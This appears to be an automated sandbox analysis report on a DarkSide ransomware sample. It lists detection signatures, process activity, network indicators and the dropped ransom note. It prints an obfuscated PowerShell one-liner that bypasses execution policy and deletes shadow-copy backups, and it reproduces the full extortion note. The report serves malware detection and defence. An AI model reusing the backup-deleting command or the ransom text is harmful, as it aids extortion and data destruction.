Play interactive tour

Edit tour

Analysis Report rUUR0qQI22

Overview

General Information

Sample Name:	rUUR0qQI22 (renamed file extension from none to exe)
Analysis ID:	401962
MD5:	9d418ecc0f3bf45029263b0944236884
SHA1:	eeb28144f39b275ee1ec008859e80f215710dc57
SHA256:	151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5
Tags:	DarkSideRansomware
Infos:
Most interesting Screenshot:

Detection

DarkSide

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Found ransom note / readme

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Yara detected DarkSide Ransomware

Bypasses PowerShell execution policy

Contains functionalty to change the wallpaper

Deletes itself after installation

Found Tor onion address

Machine Learning detection for sample

Obfuscated command line found

Tries to harvest and steal browser information (history, passwords, etc)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to delete services

Contains functionality to enumerate running services

Contains functionality to query network adapater information

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

IP address seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Startup

System is w10x64

rUUR0qQI22.exe (PID: 3508 cmdline: 'C:\Users\user\Desktop\rUUR0qQI22.exe' MD5: 9D418ECC0F3BF45029263B0944236884)

powershell.exe (PID: 1004 cmdline: powershell -ep bypass -c '(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s' MD5: 95000560239032BC68B4C2FDFCDEF913)

conhost.exe (PID: 2200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 8768 cmdline: 'C:\Windows\system32\cmd.exe' /C DEL /F /Q C:\Users\user\Desktop\RUUR0Q~1.EXE >> NUL MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 8776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source	Rule	Description	Author	Strings
rUUR0qQI22.exe	Unspecified_Malware_Sep1_A1	Detects malware from DrqgonFly APT report	Florian Roth

Dropped Files

Source	Rule	Description	Author
C:\README.418990b0.TXT	JoeSecurity_DarkSide	Yara detected DarkSide Ransomware	Joe Security
C:\README.418990b0.TXT	JoeSecurity_DarkSide	Yara detected DarkSide Ransomware	Joe Security
C:\README.418990b0.TXT	JoeSecurity_DarkSide	Yara detected DarkSide Ransomware	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000003.293094493.00000000007DC000.00000004.00000001.sdmp	JoeSecurity_DarkSide	Yara detected DarkSide Ransomware	Joe Security
00000000.00000003.292893139.00000000007DC000.00000004.00000001.sdmp	JoeSecurity_DarkSide	Yara detected DarkSide Ransomware	Joe Security
00000000.00000003.256370495.00000000007DC000.00000004.00000001.sdmp	JoeSecurity_DarkSide	Yara detected DarkSide Ransomware	Joe Security
00000000.00000003.209248518.00000000007E9000.00000004.00000001.sdmp	JoeSecurity_DarkSide	Yara detected DarkSide Ransomware	Joe Security
00000000.00000003.292412422.00000000007DC000.00000004.00000001.sdmp	JoeSecurity_DarkSide	Yara detected DarkSide Ransomware	Joe Security
00000000.00000003.290688765.00000000007DC000.00000004.00000001.sdmp	JoeSecurity_DarkSide	Yara detected DarkSide Ransomware	Joe Security
00000000.00000003.210042199.00000000007E9000.00000004.00000001.sdmp	JoeSecurity_DarkSide	Yara detected DarkSide Ransomware	Joe Security
00000000.00000003.209243107.00000000007C6000.00000004.00000001.sdmp	JoeSecurity_DarkSide	Yara detected DarkSide Ransomware	Joe Security
00000000.00000002.428838029.00000000007AA000.00000004.00000020.sdmp	JoeSecurity_DarkSide	Yara detected DarkSide Ransomware	Joe Security
Click to see the 4 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.rUUR0qQI22.exe.ce0000.1.unpack	Unspecified_Malware_Sep1_A1	Detects malware from DrqgonFly APT report	Florian Roth
0.0.rUUR0qQI22.exe.ce0000.0.unpack	Unspecified_Malware_Sep1_A1	Detects malware from DrqgonFly APT report	Florian Roth

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus / Scanner detection for submitted sample

Show sources

Source: rUUR0qQI22.exe

Avira: detected

Multi AV Scanner detection for submitted file

Show sources

Source: rUUR0qQI22.exe

ReversingLabs: Detection: 93%

Machine Learning detection for sample

Show sources

Source: rUUR0qQI22.exe

Joe Sandbox ML: detected

Source: rUUR0qQI22.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: C:\Users\user\Desktop\rUUR0qQI22.exe	File created: C:\\README.418990b0.TXT	Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe	File created: C:\Recovery\README.418990b0.TXT	Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe	File created: C:\Users\README.418990b0.TXT	Jump to behavior

Source: rUUR0qQI22.exe

Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source: C:\Users\user\Desktop\rUUR0qQI22.exe	Code function: 0_2_00CE5490 RtlAllocateHeap,RtlAllocateHeap,wcscpy,wcslen,FindFirstFileExW,wcscpy,wcsrchr,wcslen,wcscpy,GetFileAttributesW,PathIsDirectoryEmptyW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RtlFreeHeap,RtlFreeHeap,	0_2_00CE5490
Source: C:\Users\user\Desktop\rUUR0qQI22.exe	Code function: 0_2_00CE67AD RtlAllocateHeap,RtlAllocateHeap,wcscpy,GetFileAttributesW,PathAddBackslashW,wcslen,FindFirstFileExW,wcscpy,wcslen,wcscpy,_wcsicmp,wcsstr,wcsstr,GetFileAttributesW,wcsrchr,FindNextFileW,FindClose,wcsrchr,wcsrchr,PathIsDirectoryEmptyW,RemoveDirectoryW,RtlFreeHeap,RtlFreeHeap,	0_2_00CE67AD
Source: C:\Users\user\Desktop\rUUR0qQI22.exe	Code function: 0_2_00CE525B wcscpy,wcslen,FindFirstFileExW,wcscpy,wcsrchr,wcscpy,FindNextFileW,FindClose,	0_2_00CE525B
Source: C:\Users\user\Desktop\rUUR0qQI22.exe	Code function: 0_2_00CE5368 wcscpy,wcslen,FindFirstFileExW,wcscpy,wcslen,wcscpy,FindNextFileW,FindClose,	0_2_00CE5368

Source: C:\Users\user\Desktop\rUUR0qQI22.exe

Code function: 0_2_00CE51E6 GetLogicalDriveStringsW,GetDriveTypeW,wcscpy,

0_2_00CE51E6

Source: C:\Users\user\Desktop\rUUR0qQI22.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\NULL	Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data	Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe	File opened: C:\Users\user\AppData\Local\Google\NULL	Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics	Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\NULL	Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome	Jump to behavior

Networking:

Found Tor onion address

Show sources

Source: README.418990b0.TXT.0.dr

String found in binary or memory: 2) Open our website: http://darksidfqzcuhtk2.onion/CZEX8E0GR0AO4ASUCJE1K824OKJA1G24B8B3G0P84LJTTE7W8EC86JBE7NBXLMRT

Source: Joe Sandbox View

IP Address: 185.105.109.19 185.105.109.19

Source: global traffic

TCP traffic: 192.168.2.3:49717 -> 185.105.109.19:443

Source: unknown

DNS traffic detected: queries for: securebestapp20.com

Source: powershell.exe, 00000006.00000002.287565271.00000165FE112000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: README.418990b0.TXT.0.dr	String found in binary or memory: http://darksidfqzcuhtk2.onion/CZEX8E0GR0AO4ASUCJE1K824OKJA1G24B8B3G0P84LJTTE7W8EC86JBE7NBXLMRT
Source: powershell.exe, 00000006.00000002.284710832.00000165901A3000.00000004.00000001.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000006.00000002.280232531.0000016580211000.00000004.00000001.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000006.00000002.279994844.0000016580001000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000006.00000002.280232531.0000016580211000.00000004.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000006.00000002.284710832.00000165901A3000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000006.00000002.284710832.00000165901A3000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000006.00000002.284710832.00000165901A3000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000006.00000002.280232531.0000016580211000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000006.00000002.282581454.000001658117D000.00000004.00000001.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000006.00000002.284710832.00000165901A3000.00000004.00000001.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: rUUR0qQI22.exe, 00000000.00000002.431464752.0000000003855000.00000004.00000001.sdmp, rUUR0qQI22.exe, 00000000.00000002.431628037.00000000038C0000.00000004.00000001.sdmp	String found in binary or memory: https://securebestapp20.com/jVPuJOnhRSBl
Source: rUUR0qQI22.exe, 00000000.00000002.431628037.00000000038C0000.00000004.00000001.sdmp	String found in binary or memory: https://securebestapp20.com/jVPuJOnhRSBlO
Source: README.418990b0.TXT.0.dr	String found in binary or memory: https://torproject.org/

Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443

Spam, unwanted Advertisements and Ransom Demands:

Found ransom note / readme

Show sources

Source: C:\README.418990b0.TXT

Dropped file: ----------- [ Welcome to DarkSide ] -------------> What happend? ---------------------------------------------- Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. Follow our instructions below and you will recover all your data. What guarantees? ---------------------------------------------- We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. We guarantee to decrypt one file for free. Go to the site and contact us. How to get access on website? ---------------------------------------------- Using a TOR browser: 1) Download and install TOR browser from this site: https://torproject.org/ 2) Open our website: http://darksidfqzcuhtk2.onion/CZEX8E0GR0AO4ASUCJE1K824OKJA1G24B8B3G0P84LJTTE7W8EC86JBE7NBXLMRT When you open our website, put the following data in the input form: Key: 0kZdK3HQhsAkUtvRl41QkOdpJvzcWnCrBjjgg5U4zfuWeTnZR5Ssjd3QLHpmbjxjo7uWzKbt8qPVuYN38TsDPI3bemd5I40ksemIzuI5OhIHZsi9cn3Wpd7OUT72FP9MyAUzR586yMsI2Ygri9in0Bf4EkG0pmBOLyRG1T788foGJQW1WxS1Qd2sMVvX0jKlbGG1zLp7g0u6buDCzSMyTjWjuVzJYufBBv7S2XvciEVvboiTNbZA4UUU6PttKERQSb018aILd6xO3ulk6fbEgZDO5tZSGn2zRevn5YXnHtg6vt1ToLe3izQOgYbs8Ja1fkfJBUYVux1ITyWBjpn0xPayKfwln8SqgMkbqiDyxEDEtFhqiffLcONMhi4TmW50loZIC6mWSaOjThWp6XSJUWPtY8Mkzs8Cs0qjPahx58iAEVIRGUVpLkMs7xPN7ydZ6wMWaOcRC1AD1JEUVTjLikXXyckgYaS6FnEv0UNEsv6QbTLSpDomIg3rEYZBib6ozrwH5n0M5wrKo8NciUBmfJWDP4XKkjznpsa05rEpuAklM0dMmZsYGVR !!! DANGER !!! DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. !!! DANGER !!!

Jump to dropped file

Yara detected DarkSide Ransomware

Show sources

Source: Yara match	File source: 00000000.00000003.293094493.00000000007DC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.292893139.00000000007DC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.256370495.00000000007DC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.209248518.00000000007E9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.292412422.00000000007DC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.290688765.00000000007DC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.210042199.00000000007E9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.209243107.00000000007C6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.428838029.00000000007AA000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: C:\README.418990b0.TXT, type: DROPPED
Source: Yara match	File source: C:\README.418990b0.TXT, type: DROPPED
Source: Yara match	File source: C:\README.418990b0.TXT, type: DROPPED

Contains functionalty to change the wallpaper

Show sources

Source: C:\Users\user\Desktop\rUUR0qQI22.exe

Code function: 0_2_00CE4255 CreateFontW,RtlFreeHeap,SelectObject,RtlAllocateHeap,_swprintf,GetTextExtentPoint32W,SelectObject,SetTextColor,SetBkMode,SetBkColor,DrawTextW,SelectObject,SHGetSpecialFolderPathW,PathAddBackslashW,wcscat,wcslen,CreateFileW,WriteFile,WriteFile,WriteFile,CloseHandle,RegOpenKeyExW,wcslen,RegSetValueExW,wcslen,RegSetValueExW,SystemParametersInfoW,RtlFreeHeap,RtlFreeHeap,RtlFreeHeap,RegCloseKey,CloseHandle,DeleteObject,DeleteObject,RtlFreeHeap,DeleteObject,DeleteDC,DeleteDC,

0_2_00CE4255

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: rUUR0qQI22.exe, type: SAMPLE	Matched rule: Detects malware from DrqgonFly APT report Author: Florian Roth
Source: 0.2.rUUR0qQI22.exe.ce0000.1.unpack, type: UNPACKEDPE	Matched rule: Detects malware from DrqgonFly APT report Author: Florian Roth
Source: 0.0.rUUR0qQI22.exe.ce0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects malware from DrqgonFly APT report Author: Florian Roth

Source: C:\Users\user\Desktop\rUUR0qQI22.exe	Code function: 0_2_00CE4DDA RtlAllocateHeap,NtQuerySystemInformation,RtlReAllocateHeap,RtlFreeHeap,_wcslwr,wcsstr,OpenProcess,TerminateProcess,CloseHandle,wcslen,RtlFreeHeap,	0_2_00CE4DDA
Source: C:\Users\user\Desktop\rUUR0qQI22.exe	Code function: 0_2_00CE7E5D NtSetInformationThread,IsUserAnAdmin,GetCommandLineW,CommandLineToArgvW,_wcsicmp,wcsrchr,_wcsicmp,wcsrchr,_wcsicmp,OpenMutexW,CreateMutexW,CloseHandle,CloseHandle,CloseHandle,	0_2_00CE7E5D
Source: C:\Users\user\Desktop\rUUR0qQI22.exe	Code function: 0_2_00CE4C32 NtSetInformationProcess,NtSetInformationProcess,	0_2_00CE4C32
Source: C:\Users\user\Desktop\rUUR0qQI22.exe	Code function: 0_2_00CE57E5 wcsrchr,GetCurrentProcessId,RtlAllocateHeap,NtQuerySystemInformation,RtlReAllocateHeap,RtlFreeHeap,RtlAllocateHeap,OpenProcess,DuplicateHandle,wcsrchr,_wcsicmp,RtlAllocateHeap,NtQueryInformationProcess,wcsrchr,_wcsicmp,wcslen,CloseHandle,TerminateProcess,WaitForSingleObject,CloseHandle,RtlFreeHeap,CloseHandle,CloseHandle,RtlFreeHeap,RtlFreeHeap,	0_2_00CE57E5
Source: C:\Users\user\Desktop\rUUR0qQI22.exe	Code function: 0_2_00CE56F9 CreateFileW,RtlAllocateHeap,NtQuerySystemInformation,RtlReAllocateHeap,GetCurrentProcessId,RtlFreeHeap,CloseHandle,	0_2_00CE56F9
Source: C:\Users\user\Desktop\rUUR0qQI22.exe	Code function: 0_2_00CE5787 NtQuerySystemInformation,GetCurrentProcessId,RtlFreeHeap,CloseHandle,	0_2_00CE5787
Source: C:\Users\user\Desktop\rUUR0qQI22.exe	Code function: 0_2_00CE285C NtQueryInformationProcess,	0_2_00CE285C
Source: C:\Users\user\Desktop\rUUR0qQI22.exe	Code function: 0_2_00CE585D NtQuerySystemInformation,RtlAllocateHeap,OpenProcess,RtlFreeHeap,RtlFreeHeap,	0_2_00CE585D
Source: C:\Users\user\Desktop\rUUR0qQI22.exe	Code function: 0_2_00CE5650 NtQueryInformationFile,	0_2_00CE5650
Source: C:\Users\user\Desktop\rUUR0qQI22.exe	Code function: 0_2_00CE5765 NtQuerySystemInformation,GetCurrentProcessId,RtlFreeHeap,CloseHandle,	0_2_00CE5765
Source: C:\Users\user\Desktop\rUUR0qQI22.exe	Code function: 0_2_00CE587F NtQuerySystemInformation,RtlAllocateHeap,OpenProcess,RtlFreeHeap,RtlFreeHeap,	0_2_00CE587F
Source: C:\Users\user\Desktop\rUUR0qQI22.exe	Code function: 0_2_00CE380C GetWindowsDirectoryW,wcscat,wcscat,NtAllocateVirtualMemory,wcscpy,RtlEnterCriticalSection,RtlInitUnicodeString,RtlInitUnicodeString,RtlLeaveCriticalSection,LdrEnumerateLoadedModules,	0_2_00CE380C
Source: C:\Users\user\Desktop\rUUR0qQI22.exe	Code function: 0_2_00CE4E18 NtQuerySystemInformation,_wcslwr,wcsstr,OpenProcess,TerminateProcess,CloseHandle,RtlFreeHeap,	0_2_00CE4E18
Source: C:\Users\user\Desktop\rUUR0qQI22.exe	Code function: 0_2_00CE4E3A NtQuerySystemInformation,_wcslwr,wcsstr,OpenProcess,TerminateProcess,CloseHandle,RtlFreeHeap,	0_2_00CE4E3A

Source: C:\Users\user\Desktop\rUUR0qQI22.exe

Code function: 0_2_00CE4C7B OpenSCManagerW,EnumServicesStatusExW,RtlAllocateHeap,EnumServicesStatusExW,_wcslwr,wcsstr,OpenServiceW,ControlService,DeleteService,CloseServiceHandle,wcslen,CloseServiceHandle,RtlFreeHeap,

0_2_00CE4C7B

Source: C:\Users\user\Desktop\rUUR0qQI22.exe	Code function: 0_2_00CE209C	0_2_00CE209C
Source: C:\Users\user\Desktop\rUUR0qQI22.exe	Code function: 0_2_00CE4819	0_2_00CE4819
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_00007FFAEE888169	6_2_00007FFAEE888169
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_00007FFAEE888F19	6_2_00007FFAEE888F19

Source: rUUR0qQI22.exe, 00000000.00000002.429547362.0000000000B40000.00000002.00000001.sdmp	Binary or memory string: System.OriginalFileName vs rUUR0qQI22.exe
Source: rUUR0qQI22.exe, 00000000.00000002.429694465.0000000000BA0000.00000002.00000001.sdmp	Binary or memory string: originalfilename vs rUUR0qQI22.exe
Source: rUUR0qQI22.exe, 00000000.00000002.429694465.0000000000BA0000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs rUUR0qQI22.exe
Source: rUUR0qQI22.exe, 00000000.00000002.429940296.0000000000DA0000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamemswsock.dll.muij% vs rUUR0qQI22.exe

Source: rUUR0qQI22.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: rUUR0qQI22.exe, type: SAMPLE	Matched rule: Unspecified_Malware_Sep1_A1 date = 2017-09-12, hash1 = 28143c7638f22342bff8edcd0bedd708e265948a5fcca750c302e2dca95ed9f0, author = Florian Roth, description = Detects malware from DrqgonFly APT report, reference = https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.rUUR0qQI22.exe.ce0000.1.unpack, type: UNPACKEDPE	Matched rule: Unspecified_Malware_Sep1_A1 date = 2017-09-12, hash1 = 28143c7638f22342bff8edcd0bedd708e265948a5fcca750c302e2dca95ed9f0, author = Florian Roth, description = Detects malware from DrqgonFly APT report, reference = https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.0.rUUR0qQI22.exe.ce0000.0.unpack, type: UNPACKEDPE	Matched rule: Unspecified_Malware_Sep1_A1 date = 2017-09-12, hash1 = 28143c7638f22342bff8edcd0bedd708e265948a5fcca750c302e2dca95ed9f0, author = Florian Roth, description = Detects malware from DrqgonFly APT report, reference = https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group, license = https://creativecommons.org/licenses/by-nc/4.0/

Source: classification engine

Classification label: mal100.rans.spyw.evad.winEXE@6/10@1/2

Source: C:\Users\user\Desktop\rUUR0qQI22.exe

Code function: 0_2_00CE4B67 OpenProcessToken,GetTokenInformation,RtlAllocateHeap,GetTokenInformation,AdjustTokenPrivileges,RtlFreeHeap,CloseHandle,

0_2_00CE4B67

Source: C:\Users\user\Desktop\rUUR0qQI22.exe

Code function: 0_2_00CE2C69 GetLogicalDriveStringsW,GetDriveTypeW,GetDiskFreeSpaceExW,_alldiv,_alldiv,_swprintf,wcsrchr,wcslen,

0_2_00CE2C69

Source: C:\Users\user\Desktop\rUUR0qQI22.exe

File created: C:\Users\user\AppData\Local\418990b0.ico

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2200:120:WilError_01
Source: C:\Users\user\Desktop\rUUR0qQI22.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\0ab00e5f701610d7524fc82247c75e80
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8776:120:WilError_01

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u4ayydvj.e53.ps1

Jump to behavior

Source: rUUR0qQI22.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll

Jump to behavior

Source: C:\Users\user\Desktop\rUUR0qQI22.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\rUUR0qQI22.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: rUUR0qQI22.exe

ReversingLabs: Detection: 93%

Source: C:\Users\user\Desktop\rUUR0qQI22.exe

File read: C:\Users\user\Desktop\rUUR0qQI22.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\rUUR0qQI22.exe 'C:\Users\user\Desktop\rUUR0qQI22.exe'
Source: C:\Users\user\Desktop\rUUR0qQI22.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ep bypass -c '(0..61)\|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\rUUR0qQI22.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /C DEL /F /Q C:\Users\user\Desktop\RUUR0Q~1.EXE >> NUL
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\rUUR0qQI22.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ep bypass -c '(0..61)\|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s'	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: rUUR0qQI22.exe

Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source: rUUR0qQI22.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Data Obfuscation:

Obfuscated command line found

Show sources

Source: C:\Users\user\Desktop\rUUR0qQI22.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ep bypass -c '(0..61)\|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s'
Source: C:\Users\user\Desktop\rUUR0qQI22.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ep bypass -c '(0..61)\|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s'			Jump to behavior

Source: rUUR0qQI22.exe

Static PE information: real checksum: 0xfa78 should be: 0x16ef0

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Code function: 6_2_00007FFAEE881FA7 push esp; retf

6_2_00007FFAEE881FA8

Source: C:\Users\user\Desktop\rUUR0qQI22.exe	File created: C:\\README.418990b0.TXT	Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe	File created: C:\Recovery\README.418990b0.TXT	Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe	File created: C:\Users\README.418990b0.TXT	Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Deletes itself after installation

Show sources

Source: C:\Users\user\Desktop\rUUR0qQI22.exe

Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /C DEL /F /Q C:\Users\user\Desktop\RUUR0Q~1.EXE >> NUL

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
